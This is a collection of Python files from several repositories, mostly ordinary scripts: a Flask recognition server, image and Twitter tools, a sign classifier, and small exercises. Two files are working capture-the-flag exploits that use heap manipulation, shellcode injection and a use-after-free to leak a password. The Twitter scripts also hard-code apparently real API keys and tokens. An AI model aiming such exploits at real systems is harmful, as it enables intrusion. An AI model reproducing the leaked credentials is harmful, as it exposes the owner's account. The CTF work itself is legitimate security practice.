# Create a new connection
con=connection()
# Create a cursor on the connection
cur=con.cursor()
return [("user_id",),]
|
Python
| 206
| 26.485437
| 361
|
/yelp_python/app.py
| 0.622395
| 0.612681
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
from car_recg import app
from car_recg.recg_ser import RecgServer
from ini_conf import MyIni
if __name__ == '__main__':
rs = RecgServer()
rs.main()
my_ini = MyIni()
sys_ini = my_ini.get_sys_conf()
app.config['THREADS'] = sys_ini['threads']
app.config['MAXSIZE'] = sys_ini['threads'] * 16
app.run(host='0.0.0.0', port=sys_ini['port'], threaded=True)
del rs
del my_ini
|
Python
| 14
| 27.857143
| 64
|
/run.py
| 0.613861
| 0.59901
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
# -*- coding: utf-8 -*-
import Queue
class Config(object):
# 密码 string
SECRET_KEY = 'hellokitty'
# 服务器名称 string
HEADER_SERVER = 'SX-CarRecgServer'
# 加密次数 int
ROUNDS = 123456
# token生存周期,默认1小时 int
EXPIRES = 7200
# 数据库连接 string
SQLALCHEMY_DATABASE_URI = 'mysql://root:[email protected]/hbc_store'
# 数据库连接绑定 dict
SQLALCHEMY_BINDS = {}
# 用户权限范围 dict
SCOPE_USER = {}
# 白名单启用 bool
WHITE_LIST_OPEN = True
# 白名单列表 set
WHITE_LIST = set()
# 处理线程数 int
THREADS = 4
# 允许最大数队列为线程数16倍 int
MAXSIZE = THREADS * 16
# 图片下载文件夹 string
IMG_PATH = 'img'
# 图片截取文件夹 string
CROP_PATH = 'crop'
# 超时 int
TIMEOUT = 5
# 识别优先队列 object
RECGQUE = Queue.PriorityQueue()
# 退出标记 bool
IS_QUIT = False
# 用户字典 dict
USER = {}
# 上传文件保存路径 string
UPLOAD_PATH = 'upload'
class Develop(Config):
DEBUG = True
class Production(Config):
DEBUG = False
class Testing(Config):
TESTING = True
|
Python
| 53
| 17.905661
| 69
|
/car_recg/config.py
| 0.593812
| 0.56986
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
# -*- coding: utf-8 -*-
import os
import Queue
import random
from functools import wraps
import arrow
from flask import g, request
from flask_restful import reqparse, Resource
from passlib.hash import sha256_crypt
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from car_recg import app, db, api, auth, limiter, logger, access_logger
from models import Users, Scope
import helper
def verify_addr(f):
"""IP地址白名单"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not app.config['WHITE_LIST_OPEN'] or request.remote_addr == '127.0.0.1' or request.remote_addr in app.config['WHITE_LIST']:
pass
else:
return {'status': '403.6',
'message': u'禁止访问:客户端的 IP 地址被拒绝'}, 403
return f(*args, **kwargs)
return decorated_function
@auth.verify_password
def verify_password(username, password):
if username.lower() == 'admin':
user = Users.query.filter_by(username='admin').first()
else:
return False
if user:
return sha256_crypt.verify(password, user.password)
return False
def verify_token(f):
"""token验证装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not request.headers.get('Access-Token'):
return {'status': '401.6', 'message': 'missing token header'}, 401
token_result = verify_auth_token(request.headers['Access-Token'],
app.config['SECRET_KEY'])
if not token_result:
return {'status': '401.7', 'message': 'invalid token'}, 401
elif token_result == 'expired':
return {'status': '401.8', 'message': 'token expired'}, 401
g.uid = token_result['uid']
g.scope = set(token_result['scope'])
return f(*args, **kwargs)
return decorated_function
def verify_scope(scope):
def scope(f):
"""权限范围验证装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'all' in g.scope or scope in g.scope:
return f(*args, **kwargs)
else:
return {}, 405
return decorated_function
return scope
class Index(Resource):
def get(self):
return {
'user_url': '%suser{/user_id}' % (request.url_root),
'scope_url': '%suser/scope' % (request.url_root),
'token_url': '%stoken' % (request.url_root),
'recg_url': '%sv1/recg' % (request.url_root),
'uploadrecg_url': '%sv1/uploadrecg' % (request.url_root),
'state_url': '%sv1/state' % (request.url_root)
}, 200, {'Cache-Control': 'public, max-age=60, s-maxage=60'}
class RecgListApiV1(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('imgurl', type=unicode, required=True,
help='A jpg url is require', location='json')
parser.add_argument('coord', type=list, required=True,
help='A coordinates array is require',
location='json')
args = parser.parse_args()
# 回调用的消息队列
que = Queue.Queue()
if app.config['RECGQUE'].qsize() > app.config['MAXSIZE']:
return {'message': 'Server Is Busy'}, 449
imgname = '%32x' % random.getrandbits(128)
imgpath = os.path.join(app.config['IMG_PATH'], '%s.jpg' % imgname)
try:
helper.get_url_img(request.json['imgurl'], imgpath)
except Exception as e:
logger.error('Error url: %s' % request.json['imgurl'])
return {'message': 'URL Error'}, 400
app.config['RECGQUE'].put((10, request.json, que, imgpath))
try:
recginfo = que.get(timeout=15)
os.remove(imgpath)
except Queue.Empty:
return {'message': 'Timeout'}, 408
except Exception as e:
logger.error(e)
else:
return {
'imgurl': request.json['imgurl'],
'coord': request.json['coord'],
'recginfo': recginfo
}, 201
class StateListApiV1(Resource):
def get(self):
return {
'threads': app.config['THREADS'],
'qsize': app.config['RECGQUE'].qsize()
}
class UploadRecgListApiV1(Resource):
def post(self):
# 文件夹路径 string
filepath = os.path.join(app.config['UPLOAD_PATH'],
arrow.now().format('YYYYMMDD'))
if not os.path.exists(filepath):
os.makedirs(filepath)
try:
# 上传文件命名 随机32位16进制字符 string
imgname = '%32x' % random.getrandbits(128)
# 文件绝对路径 string
imgpath = os.path.join(filepath, '%s.jpg' % imgname)
f = request.files['file']
f.save(imgpath)
except Exception as e:
logger.error(e)
return {'message': 'File error'}, 400
# 回调用的消息队列 object
que = Queue.Queue()
# 识别参数字典 dict
r = {'coord': []}
app.config['RECGQUE'].put((9, r, que, imgpath))
try:
recginfo = que.get(timeout=app.config['TIMEOUT'])
except Queue.Empty:
return {'message': 'Timeout'}, 408
except Exception as e:
logger.error(e)
else:
return {'coord': r['coord'], 'recginfo': recginfo}, 201
api.add_resource(Index, '/')
api.add_resource(RecgListApiV1, '/v1/recg')
api.add_resource(StateListApiV1, '/v1/state')
api.add_resource(UploadRecgListApiV1, '/v1/uploadrecg')
|
Python
| 176
| 30.78409
| 134
|
/car_recg/views.py
| 0.558634
| 0.540222
|
josemiche11/reversebycondition
|
refs/heads/master
|
'''
Input- zoho123
Output- ohoz123
'''
char= input("Enter the string: ")
char2= list(char)
num= "1234567890"
list1= [0]*len(char)
list2=[]
for i in range(len(char)):
if char2[i] not in num:
list2.append( char2.index( char2[i]))
char2[i]= "*"
list2.reverse()
k=0
for j in range( len(char) ):
if j in list2:
list1[j]= char[list2[k]]
k= k+1
else:
list1[j]= char[j]
ch=""
for l in range(len(list1)):
ch= ch+ list1[l]
print(ch)
|
Python
| 26
| 17.461538
| 45
|
/reversebycondition.py
| 0.539526
| 0.472332
|
Lasyin/batch-resize
|
refs/heads/master
|
import os
import sys
import argparse
from PIL import Image # From Pillow (pip install Pillow)
def resize_photos(dir, new_x, new_y, scale):
if(not os.path.exists(dir)):
# if not in full path format (/usrers/user/....)
# check if path is in local format (folder is in current working directory)
if(not os.path.exists(os.path.join(os.getcwd(), dir))):
print(dir + " does not exist.")
exit()
else:
# path is not a full path, but folder exists in current working directory
# convert path to full path
dir = os.path.join(os.getcwd(), dir)
i = 1 # image counter for print statements
for f in os.listdir(dir):
if(not f.startswith('.') and '.' in f):
# accepted image types. add more types if you need to support them!
accepted_types = ["jpg", "png", "bmp"]
if(f[-3:].lower() in accepted_types):
# checks last 3 letters of file name to check file type (png, jpg, bmp...)
# TODO: need to handle filetypes of more than 3 letters (for example, jpeg)
path = os.path.join(dir, f)
img = Image.open(path)
if(scale > 0):
w, h = img.size
newIm = img.resize((w*scale, h*scale))
else:
newIm = img.resize((new_x, new_y))
newIm.save(path)
print("Image #" + str(i) + " finsihed resizing: " + path)
i=i+1
else:
print(f + " of type: " + f[-3:].lower() + " is not an accepted file type. Skipping.")
print("ALL DONE :) Resized: " + str(i) + " photos")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-d", "-directory", help="(String) Specify the folder path of images to resize")
parser.add_argument("-s", "-size", help="(Integer) New pixel value of both width and height. To specify width and height seperately, use -x and -y.")
parser.add_argument("-x", "-width", help="(Integer) New pixel value of width")
parser.add_argument("-y", "-height", help="(Integer) New pixel value of height")
parser.add_argument("-t", "-scale", help="(Integer) Scales pixel sizes.")
args = parser.parse_args()
if(not args.d or ((not args.s) and (not args.x and not args.y) and (not args.t))):
print("You have error(s)...\n")
if(not args.d):
print("+ DIRECTORY value missing Please provide a path to the folder of images using the argument '-d'\n")
if((not args.s) and (not args.x or not args.y) and (not args.t)):
print("+ SIZE value(s) missing! Please provide a new pixel size. Do this by specifying -s (width and height) OR -x (width) and -y (height) values OR -t (scale) value")
exit()
x = 0
y = 0
scale = 0
if(args.s):
x = int(args.s)
y = int(args.s)
elif(args.x and args.y):
x = int(args.x)
y = int(args.y)
elif(args.t):
scale = int(args.t)
print("Resizing all photos in: " + args.d + " to size: " + str(x)+"px,"+str(y)+"px")
resize_photos(args.d, x, y, scale)
|
Python
| 73
| 43.109589
| 179
|
/batch_resize.py
| 0.554969
| 0.551863
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import tweepy
import csv
import pandas as pd
from textblob import TextBlob
import matplotlib.pyplot as plt
####input your credentials here
consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh'
consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9'
access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg'
access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4'
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth,wait_on_rate_limit=True)
# Open/Create a file to append data
csvFile = open('tweets.csv', 'w+')
# Use csv Writer
csvWriter = csv.writer(csvFile)
tag = "#DonaldTrump"
limit = 0
res = ""
positive = 0
negative = 0
neutral = 0
csvWriter.writerow(["ID", "Username", "Twitter @", "Tweet","Tweeted At", "Favourite Count", "Retweet Count", "Sentiment"])
csvWriter.writerow([])
for tweet in tweepy.Cursor(api.search,q=""+tag,count=350,lang="en",tweet_mode = "extended").items():
# print (tweet.created_at, tweet.text)
temp = tweet.full_text
if temp.startswith('RT @'):
continue
blob = TextBlob(tweet.full_text)
if blob.sentiment.polarity > 0:
res = "Positive"
positive = positive+1
elif blob.sentiment.polarity == 0:
res = "Neutral"
neutral = neutral+1
else:
res = "Negative"
negative = negative+1
print ("ID:", tweet.id)
print ("User ID:", tweet.user.id)
print ("Name: ", tweet.user.name)
print ("Twitter @:", tweet.user.screen_name)
print ("Text:", tweet.full_text)
print ("Tweet length:", len(tweet.full_text))
print ("Created:(UTC)", tweet.created_at)
print ("Favorite Count:", tweet.favorite_count)
print ("Retweet count:", tweet.retweet_count)
print ("Sentiment:", res)
# print ("Retweeted? :", tweet.retweeted)
# print ("Truncated:", tweet.truncated)
print ("\n\n")
csvWriter.writerow([tweet.id, tweet.user.name, tweet.user.screen_name, tweet.full_text,tweet.created_at, tweet.favorite_count, tweet.retweet_count, res])
csvWriter.writerow([])
limit = limit + 1
if limit == 25:
break
print ("Done")
print ("\n\n\n")
total = positive+negative+neutral
positivePercent = 100*(positive/total)
negativePercent = 100*(negative/total)
neutralPercent = 100*(neutral/total)
print ("Positive tweets: {} %".format(positivePercent))
print ("Negative tweets: {} %".format(negativePercent))
print ("Neutral tweets: {} %".format(neutralPercent))
# infile = 'tweets.csv'
# with open(infile, 'r') as csvfile:
# rows = csv.reader(csvfile)
# for row in rows:
# sentence = row[3]
# blob = TextBlob(sentence)
# print (blob.sentiment)
labels = 'Neutral', 'Positive', 'Negative'
sizes = []
sizes.append(neutralPercent)
sizes.append(positivePercent)
sizes.append(negativePercent)
colors = ['lightskyblue','yellowgreen', 'lightcoral']
explode = (0.0, 0, 0) # explode 1st slice
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=False, startangle=140)
plt.suptitle("Sentiment Analysis of {} tweets related to {}".format(limit, tag))
plt.axis('equal')
plt.show()
|
Python
| 104
| 28.73077
| 157
|
/tweepy_tester.py
| 0.66796
| 0.655674
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import tweepy
import csv
import pandas as pd
# keys and tokens from the Twitter Dev Console
consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh'
consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9'
access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg'
access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4'
#Twitter only allows access to a users most recent 3240 tweets with this method
#authorize twitter, initialize tweepy
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
#initialize a list to hold all the tweepy Tweets
alltweets = []
#make initial request for most recent tweets (200 is the maximum allowed count)
new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended")
#save most recent tweets
alltweets.extend(new_tweets)
#save the id of the oldest tweet less one
# oldest = alltweets[-1].id - 1
#keep grabbing tweets until there are no tweets left to grab
while len(new_tweets) > 0:
# print "getting tweets before %s" % (oldest)
#all subsiquent requests use the max_id param to prevent duplicates
new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended")
#save most recent tweets
alltweets.extend(new_tweets)
#update the id of the oldest tweet less one
oldest = alltweets[-1].id - 1
# print "...%s tweets downloaded so far" % (len(alltweets))
#transform the tweepy tweets into a 2D array that will populate the csv
outtweets = [[tweet.id_str, tweet.created_at, tweet.full_tweet.encode("utf-8"), tweet.retweet_count, tweet.favorite_count] for tweet in alltweets]
#write the csv
with open('tweets.csv', 'w+') as f:
writer = csv.writer(f)
writer.writerow(["id","created_at","full_text","retweet_count","favorite_count"])
writer.writerows(outtweets)
|
Python
| 52
| 32.53846
| 146
|
/twitter1.py
| 0.729513
| 0.716332
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import csv
csvFile = open('res.csv', 'w+')
|
Python
| 2
| 20.5
| 31
|
/tester.py
| 0.642857
| 0.642857
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
from test import mining
tag = "#WednesdayWisdom"
limit = "10"
sen_list = mining(tag,int(limit))
print(sen_list)
|
Python
| 5
| 21.4
| 33
|
/Twitter-Flask/untitled.py
| 0.72973
| 0.711712
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
from flask import Flask, render_template, request
from test import mining
app = Flask(__name__)
@app.route('/')
def index():
return render_template('hello.html')
@app.route('/', methods=['GET', 'POST'])
def submit():
if request.method == 'POST':
print (request.form) # debug line, see data printed below
tag = request.form['tag']
limit = request.form['limit']
# msg = tag+" "+limit
sen_list = mining(tag,limit)
msg = "Positive Percent = "+sen_list[0]+"% <br>Negative Percent = "+sen_list[1]+"% <br>Neutral Percent = "+sen_list[2]+"%"
return ""+msg
if __name__ == '__main__':
app.run(debug = True)
print("This")
|
Python
| 24
| 25.416666
| 124
|
/Twitter-Flask/app.py
| 0.631912
| 0.627172
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
#!/usr/bin/env python
print ("some output")
return "hello"
|
Python
| 4
| 14
| 21
|
/Twitter-Flask/hello.py
| 0.694915
| 0.694915
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import matplotlib.pyplot as plt
# Data to plot
labels = 'Neutral', 'Positive', 'Negative'
sizes = [20, 40, 40]
colors = ['lightskyblue','yellowgreen', 'lightcoral']
explode = (0.0, 0, 0) # explode 1st slice
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
# plt.title('Sentiment analysis')
plt.suptitle('Analysing n tweets related to #')
plt.show()
|
Python
| 16
| 27.125
| 61
|
/piPlotter.py
| 0.685969
| 0.650334
|
nopple/ctf
|
refs/heads/master
|
#!/usr/bin/env python
import socket, subprocess, sys
from struct import pack, unpack
global scenes
global officers
scenes = {}
officers = {}
remote = len(sys.argv) > 1
PORT = 8888
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if remote:
HOST = "dosfun4u_5d712652e1d06a362f7fc6d12d66755b.2014.shallweplayaga.me"
else:
HOST = '127.0.0.1'
def chksum(data):
ret = 0
for d in data:
ret += ord(d)
return ret & 0xffff
def add_officer(officer_id, status=0, x=0, y=0):
global officers
print 'update' if officers.has_key(officer_id) and officers[officer_id] else 'add', 'officer', hex(officer_id)
officers[officer_id] = True
payload = pack('H', 0x7d0)
payload += pack('H', officer_id)
payload += pack('H', status)
payload += pack('H', x)
payload += pack('H', y)
payload += pack('H', 0x0)
return payload
def remove_officer(officer_id):
global officers
print 'remove officer', hex(officer_id), 'should work' if officers.has_key(officer_id) and officers[officer_id] else 'should fail'
officers[officer_id] = False
payload = pack('H', 0xbb8)
payload += pack('H', officer_id)
return payload
def add_scene(scene_id, data2, data3, inline_data='', x=0, y=0):
global scenes
print 'update' if scenes.has_key(scene_id) and scenes[scene_id] else 'add', 'scene', hex(scene_id)
scenes[scene_id] = True
size1 = len(inline_data)/2
size2 = len(data2)
size3 = len(data3)
payload = pack('H', 0xfa0)
payload += pack('H', scene_id)
payload += pack('H', x)
payload += pack('H', y)
payload += pack('B', size1)
payload += pack('B', size2)
payload += pack('H', size3)
payload += pack('H', 0)
payload += inline_data[:size1*2]
payload += data2
payload += data3
return payload
def recv_all(s, size):
ret = []
received = 0
while size > received:
c = s.recv(size-received)
if c == '':
raise Exception('Connection closed')
ret.append(c)
received += len(c)
return ''.join(ret)
def recv_until(s, pattern):
ret = ''
while True:
c = s.recv(1)
if c == '':
raise Exception("Connection closed")
ret += c
if ret.find(pattern) != -1:
break
return ret
s.connect((HOST, PORT))
if remote:
print s.recv(4096)
buf = s.recv(4096)
print buf
data = buf.split(' ')[0]
print 'challenge = {}'.format(data)
print 'hashcatting...'
p = subprocess.Popen(['./hashcat', data], stdout=subprocess.PIPE);
result = p.communicate()[0].strip('\n\r\t ')
print 'response = {}'.format(result)
s.send(result)
def send_cmd(s,payload,recvLen=0):
payload += pack('H', chksum(payload))
s.send(payload)
return recv_all(s, recvLen)
shellcode = open('shellcode', 'rb').read()
print 'Getting block into free-list'
send_cmd(s,add_officer(1),5)
send_cmd(s,remove_officer(1),5)
print 'Adding officer to reuse block from free-list'
send_cmd(s,add_officer(0xc),5)
print 'Writing shellcode to 008f:0000'
send_cmd(s,add_scene(1, pack("<HHHHHH", 0xc, 0, 0x4688, 0x8f, 0, 0), shellcode),5)
print 'Modifying officer structure to include pointer to fake officer on stack'
send_cmd(s,add_scene(2, pack("<HHHHHH", 1, 0, 0, 0, 0x47aa, 0x011f), "lolololol"),5)
print 'Writing return to shellcode on stack'
send_cmd(s,add_officer(0x945, 0x1d26, 0x10, 0x97),5)
print 'Receiving response...'
print 'Key 1:', recv_until(s,'\n').replace('\x00', '')[:-1]
print 'Key 2:', recv_until(s,'\n')[:-1]
|
Python
| 124
| 25.620968
| 131
|
/dosfun4u/pwn.py
| 0.668585
| 0.624962
|
nopple/ctf
|
refs/heads/master
|
#!/usr/bin/env python
import socket
from struct import pack, unpack
DEBUG = False
server = "shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me"
server = "127.0.0.1"
port = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.settimeout(30)
def recv_until(s, pattern):
ret = ''
while True:
c = s.recv(1)
if c == '':
raise Exception("Connection closed")
ret += c
if ret.find(pattern) != -1:
break
return ret
# trigger use-after-free by creating 2 items and then removing them in order
print recv_until(s, "$ ")
print "set 1 abcd"
s.send("set 1 abcd\n")
print recv_until(s, "$ ")
print "set 2 abcd"
s.send("set 2 abcd\n")
print recv_until(s, "$ ")
print "set 1"
s.send("set 1\n")
print recv_until(s, "$ ")
print "set 2"
s.send("set 2\n")
print recv_until(s, "$ ")
print "show <pointers>"
# set use-after-free item via strdup of argument to 'show' command
# first two items are the key,value pair followed by blink and flink
# use a pointer to the string "password" in the code section for the key (0x80495d0)
# use the location of the password in bss for the value (0x804c3a0)
# use something to terminate the linked list for flink and blink
# - can't use null directly here since the strdup allocation would be cut short (must be 16 bytes to re-use the free'd block)
# - just use a pointer to some nulls in bss instead (0x804c390)
s.send("show " + pack("<IIII", 0x80495d0, 0x804C3A0, 0x804C390, 0x0804C390) + "\n")
print recv_until(s, "$ ")
# now, this will simply dump the password for us
print "show"
s.send("show\n")
a = recv_until(s, ': ')
pw = recv_until(s, '\n')[:-1]
b = recv_until(s, "$ ")
print a + pw + '\n' + b
print 'Enable password: "' + pw + '"'
print "enable " + pw
s.send('enable ' + pw + '\n')
print recv_until(s, "# ")
print "flag"
s.send('flag\n')
print recv_until(s, "# ")
print "quit"
s.send('quit\n')
|
Python
| 71
| 25.830986
| 127
|
/shitsco/pwn.py
| 0.669816
| 0.618898
|
phu-bui/Nhan_dien_bien_bao_giao_thong
|
refs/heads/master
|
import tkinter as tk
from tkinter import filedialog
from tkinter import *
from PIL import Image, ImageTk
import numpy
from keras.models import load_model
model = load_model('BienBao.h5')
class_name = {
1:'Speed limit (20km/h)',
2:'Speed limit (30km/h)',
3:'Speed limit (50km/h)',
4:'Speed limit (60km/h)',
5:'Speed limit (70km/h)',
6:'Speed limit (80km/h)',
7:'End of speed limit (80km/h)',
8:'Speed limit (100km/h)',
9:'Speed limit (120km/h)',
10:'No passing',
11:'No passing veh over 3.5 tons',
12:'Right-of-way at intersection',
13:'Priority road',
14:'Yield',
15:'Stop',
16:'No vehicles',
17:'Veh > 3.5 tons prohibited',
18:'No entry',
19:'General caution',
20:'Dangerous curve left',
21:'Dangerous curve right',
22:'Double curve',
23:'Bumpy road',
24:'Slippery road',
25:'Road narrows on the right',
26:'Road work',
27:'Traffic signals',
28:'Pedestrians',
29:'Children crossing',
30:'Bicycles crossing',
31:'Beware of ice/snow',
32:'Wild animals crossing',
33:'End speed + passing limits',
34:'Turn right ahead',
35:'Turn left ahead',
36:'Ahead only',
37:'Go straight or right',
38:'Go straight or left',
39:'Keep right',
40:'Keep left',
41:'Roundabout mandatory',
42:'End of no passing',
43:'End no passing veh > 3.5 tons'
}
top=tk.Tk()
top.geometry('800x600')
top.title('Phan loai bien bao giao thong')
top.configure(background='#CDCDCD')
label = Label(top, background = '#CDCDCD', font=('arial',15,'bold'))
label.place(x=0, y=0, relwidth = 1, relheight = 1)
sign_image = Label(top)
def classify(file_path):
global label_packed
image = Image.open(file_path)
image = image.resize((30, 30))
image = numpy.expand_dims(image, axis=0)
image = numpy.array(image)
print(image.shape)
pred = model.predict_classes([image])[0]
sign = class_name[pred+1]
print(sign)
label.configure(foreground = '#011638', text = sign)
def show_classify_button(file_path):
classify_button = Button(top,text='Phan loai', command = lambda : classify(file_path), padx=10, pady=5)
classify_button.configure(background='GREEN', foreground = 'white', font = ('arial', 10, 'bold'))
classify_button.place(relx = 0.79, rely = 0.46)
def upload_image():
try:
file_path = filedialog.askopenfilename()
uploaded = Image.open(file_path)
uploaded.thumbnail(((top.winfo_width()/2.25),
(top.winfo_height()/2.25)))
im = ImageTk.PhotoImage(uploaded)
sign_image.configure(image= im)
sign_image.image = im
label.configure(text='')
show_classify_button(file_path)
except:
pass
upload = Button(top, text='Upload an image', command=upload_image, padx = 10, pady = 5)
upload.configure(background='#364156', foreground = 'white', font = ('arial', 10, 'bold'))
upload.pack(side = BOTTOM, pady = 50)
sign_image.pack(side=BOTTOM, expand = True)
label.pack(side = BOTTOM, expand = True)
heading = Label(top, text = 'Bien bao giao thong cua ban', pady = 20, font = ('arial', 20, 'bold'))
heading.configure(background = '#CDCDCD', foreground = '#364156')
heading.pack()
top.mainloop()
|
Python
| 103
| 30.747572
| 107
|
/main.py
| 0.631386
| 0.579688
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
def returnSum(dict):
sum=0
for i in dict:
sum=sum+dict[i]
return sum
dict={'Rick':85,'Amit':42,'George':53,'Tanya':60,'Linda':35}
print 'sum:', returnSum(dict)
|
Python
| 7
| 24.714285
| 60
|
/Dictionary with function.py
| 0.582888
| 0.524064
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
n=int(input("enter the numbers u want to print:"))
for i in range(1,n+1):
if(i%3==0):
print ('Fizz')
continue
elif(i%5==0):
print ('Buzz')
continue
print i
|
Python
| 9
| 21.222221
| 50
|
/FizzBuzz.py
| 0.46789
| 0.440367
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
def switch(on_strike):
players = {1,2}
return list(players.difference(set([on_strike])))[0]
def get_player(previous_score, previous_player, previous_bowl_number):
if previous_score%2 == 0 and (previous_bowl_number%6 !=0 or previous_bowl_number ==0):
player = previous_player
elif previous_score%2 != 0 and previous_bowl_number % 6 == 0:
player = previous_player
else:
player = switch(previous_player)
return player
a = [1, 2, 0, 0, 4, 1, 6, 2, 1, 3]
player_turns = []
player_score_chart = {1:0, 2:0}
total_score = 0
previous_score=0
previous_player=1
previous_bowl_number=0
for runs in a:
player_turns.append(get_player(previous_score, previous_player, previous_bowl_number))
previous_bowl_number+=1
previous_score=runs
previous_player=player_turns[-1]
player_score_chart[previous_player] += previous_score
total_score += previous_score
print 'Total Score : ', total_score
print 'Batsman 1 Score : ', player_score_chart[1]
print 'Batsman 2 Score : ', player_score_chart[2]
|
Python
| 36
| 28.611111
| 90
|
/Cricket Match Player Score.py
| 0.646098
| 0.61343
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
arr=[1,2,3,5,8,4,7,9,1,4,12,5,6,5,2,1,0,8,1]
a = [None] * len(arr);
visited = 0;
for i in range(0, len(arr)):
count = 1;
for j in range(i+1, len(arr)):
if(arr[i] == arr[j]):
count = count + 1;
a[j] = visited;
if(a[i] != visited):
a[i] = count;
for i in range(0, len(a)):
if(a[i] != visited):
print(" "+ str(arr[i]) +" has occured "+ str(a[i])+" times");
|
Python
| 14
| 31.285715
| 69
|
/repeat.py
| 0.408511
| 0.353191
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# represent the "board" in code
# dependencies
import random
class Board:
def __init__(self, width=10):
self.width = width
self.height = width * 2
self.WALL_CHANCE = .25
self.FLOOR_CHANCE = .15
# create the grid
self.create_random_grid()
def create_random_grid(self):
# reset old grid
self.grid = []
# generate cells for new grid
for i in range(self.width * self.height):
# is the cell at the left, right, top, or bottom?
is_left = True if i % self.width == 0 else False
is_right = True if i % self.width == self.width-1 else False
is_top = True if i < self.width else False
is_bottom = True if i > (self.width * self.height - self.width) else False
# create the cell
cell = {
"left" : is_left,
"right" : is_right,
"roof" : is_top,
"floor" : is_bottom,
"ID" : i
}
# append to grid
self.grid.append(cell)
# randomly generate walls
total = self.width * self.height
horizontal_amount = int(total * self.FLOOR_CHANCE)
verticle_amount = int(total * self.WALL_CHANCE)
# generate the walls
for _i in range(verticle_amount):
random_index = random.randrange(0, total)
adding_num = -1 if random_index == total - 1 else 1
first = "right" if adding_num == 1 else "left"
second = "right" if first == "left" else "left"
self.grid[random_index][first] = True
self.grid[random_index + adding_num][second] = True
# generate the floors
for _i in range(horizontal_amount):
random_index = random.randrange(0, total)
adding_num = self.width * -1 if random_index > (total - self.width) else self.width
first = "floor" if adding_num == self.width else "roof"
second = "floor" if first == "roof" else "roof"
self.grid[random_index][first] = True
self.grid[random_index + adding_num - 1][second] = True
def can_move_from(self, cell_index):
# TODO this works but its a lot of repeated code. Can it be made better?
# can you move left
can_move_left = False
is_left = True if cell_index % self.width == 0 else False
if not is_left and self.grid[cell_index]["left"] == False:
left_cell = self.grid[cell_index - 1]
is_wall_left = True if left_cell["right"] == True else False
can_move_left = True if not is_wall_left else False
# can you move right
can_move_right = False
is_right = True if cell_index % self.width == self.width-1 else False
if not is_right and self.grid[cell_index]["right"] == False:
right_cell = self.grid[cell_index + 1]
is_wall_right = True if right_cell["left"] == True else False
can_move_right = True if not is_wall_right else False
# can you move up
can_move_up = False
is_top = True if cell_index < self.width else False
if not is_top and self.grid[cell_index]["roof"] == False:
top_cell = self.grid[cell_index - self.width]
is_wall_top = True if top_cell["floor"] == True else False
can_move_up = True if not is_wall_top else False
# can you move down
can_move_down = False
is_bottom = True if cell_index > (self.width * self.height - self.width) else False
if not is_bottom and self.grid[cell_index]["floor"] == False:
bottom_cell = self.grid[cell_index + self.width]
is_wall_bottom = True if bottom_cell["roof"] == True else False
can_move_down = True if not is_wall_bottom else False
# return the results
return can_move_left, can_move_right, can_move_up, can_move_down
def BFS(self):
"""breadth first search to find the quickest way to the bottom"""
start_i = random.randrange(0,self.width)
paths = [ [start_i] ]
solved = False
dead_ends = []
while not solved:
for path in paths:
# find all possibles moves from path
if len(dead_ends) >= len(paths) or len(paths) > 10000: # TODO this solution sucks
return False, False
# NOTE order is left right up down
if path[-1] >= (self.width * self.height - self.width):
solved = True
return paths, paths.index(path)
possible_moves = self.can_move_from(path[-1])
if True in possible_moves:
move_order = [-1, 1, (self.width) * -1, self.width]
first_append_flag = False
origonal_path = path.copy()
for i in range(4):
possible_move = possible_moves[i]
if possible_move:
move = move_order[i]
next_index = origonal_path[-1] + move
if not next_index in origonal_path:
if not first_append_flag:
path.append(next_index)
first_append_flag = True
else:
new_path = origonal_path.copy()
new_path.append(next_index)
paths.append(new_path)
if not first_append_flag:
dead_ends.append(paths.index(path))
else:
dead_ends.append(paths.index(path))
def pretty_print_BFS(self, path):
for i in range(self.width * self.height):
cell = self.grid[i]
in_path = True if cell["ID"] in path else False
number_str = str(i)
if len(number_str) == 1:
number_str += " "
elif len(number_str) == 2:
